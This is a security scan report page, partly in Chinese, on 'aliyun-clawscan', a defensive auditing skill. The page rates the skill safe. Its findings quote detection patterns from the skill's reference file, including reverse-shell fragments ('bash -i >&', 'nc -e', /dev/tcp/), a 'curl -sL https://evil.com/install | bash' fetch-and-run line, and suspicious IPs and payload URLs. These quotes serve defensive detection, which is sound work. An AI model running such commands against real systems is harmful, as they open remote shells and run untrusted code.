aliyun-clawscan 安全扫描报告 — 可信 | ClawSafe

5 /100

aliyun-clawscan

Security posture analyzer for OpenClaw environment and installed skills

This is a legitimate defensive security audit tool (aliyun-clawscan) that documents detection patterns for identifying malicious behavior in OTHER skills. The flagged IOCs are documented examples of attack signatures, not actual malicious code.

技能名称aliyun-clawscan

分析耗时38.2s

引擎pi

✓

可以安装

This skill is safe to use. It provides valuable security auditing capabilities by documenting and detecting threat patterns in other skills.

资源类型	声明权限	推断权限	状态	证据
文件系统	`READ`	`READ`	✓ 一致	SKILL.md: Runs 'openclaw security audit --deep' and 'openclaw skills list'
命令执行	`READ`	`READ`	✓ 一致	SKILL.md: Runs 'openclaw' CLI commands only

7 严重 2 高危 18 项发现

💀

严重危险命令危险 Shell 命令

/dev/tcp/

reference/skillaudit.md:32

💀

严重危险命令危险 Shell 命令

bash -i >&

reference/skillaudit.md:43

💀

严重危险命令危险 Shell 命令

nc -e

reference/skillaudit.md:46

💀

严重危险命令危险 Shell 命令

python -c 'import socket

reference/skillaudit.md:49

🔒

严重编码执行 Base64 编码执行（代码混淆）

eval(atob(

reference/skillaudit.md:265

💀

严重危险命令危险 Shell 命令

curl | bash

reference/skillaudit.md:392

💀

严重危险命令危险 Shell 命令

curl -sL https://evil.com/install | bash

reference/skillaudit.md:527

📡

高危 IP 地址硬编码 IP 地址

1.2.3.4

reference/skillaudit.md:46

📡

高危 IP 地址硬编码 IP 地址

91.92.242.30

reference/skillaudit.md:393

🔗

中危外部 URL 外部 URL

http://\d+\.\d+\.\d+\.\d+/

reference/skillaudit.md:421

🔗

中危外部 URL 外部 URL

http://91\.92\.242\.30/

reference/skillaudit.md:422

🔗

中危外部 URL 外部 URL

http://.*\.onion/

reference/skillaudit.md:423

🔗

中危外部 URL 外部 URL

https://.*\.xyz/download

reference/skillaudit.md:424

🔗

中危外部 URL 外部 URL

https://.*\.top/install

reference/skillaudit.md:425

🔗

中危外部 URL 外部 URL

http://91.92.242.30/q0c7ew2ro8l2cfqp

reference/skillaudit.md:453

🔗

中危外部 URL 外部 URL

http://\d+\.\d+\.\d+\.\d+

reference/skillaudit.md:483

🔗

中危外部 URL 外部 URL

https://evil.com/install

reference/skillaudit.md:527

🔗

中危外部 URL 外部 URL

http://1.2.3.4/payload

reference/skillaudit.md:529

目录结构

4 文件 · 23.0 KB · 873 行

Markdown 3f · 853L Text 1f · 20L

├─ ▾ 📁 reference

│ ├─ 📝 baseline.md Markdown 107L · 2.5 KB

│ └─ 📝 skillaudit.md Markdown 571L · 13.5 KB

├─ 📄 LICENSE.txt Text 20L · 1.1 KB

└─ 📝 SKILL.md Markdown 175L · 6.0 KB

安全亮点

✓ Defensive security tool designed to protect users from malicious skills

✓ Comprehensive detection patterns covering 11 threat categories documented

✓ All IOCs are reference patterns for identifying attacks, not actual malicious code

✓ No executable scripts present - only documentation and detection rules

✓ Safety guardrails documented (static analysis only, no execution of suspicious code)

✓ Evidence-based reporting with file:line references required

✓ Clearly branded as Alibaba Cloud security capability